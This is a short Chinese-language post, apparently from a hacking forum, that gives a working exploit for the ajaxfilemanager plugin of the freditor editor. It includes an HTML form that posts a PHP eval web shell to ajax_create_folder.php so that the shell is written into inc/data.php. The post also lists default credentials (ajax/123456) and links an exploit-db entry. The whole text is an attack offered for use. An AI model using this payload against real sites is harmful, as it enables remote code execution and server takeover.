By:毅心毅意
为什么会出现漏洞...看这里
http://www.exploit-db.com/exploits/18075/
exp:
|
jiayun.html: <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"><input type="text" value="http://127.0.0.1/freditor/plugins/ajaxfilemanager/ajax_create_folder.php" name="doaction" style="width:400"><br /><input type="text" value="<?php eval($_POST[t00ls])?>" name="foo" style="width:400"><br /><input type="submit" value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){ document.QuickSearch.action=document.QuickSearch.doaction.value;}</script> |
利用
默认账号ajax
密码123456
之后exp。。
地址/freditor/plugins/ajaxfilemanager/inc/data.php
大家都懂的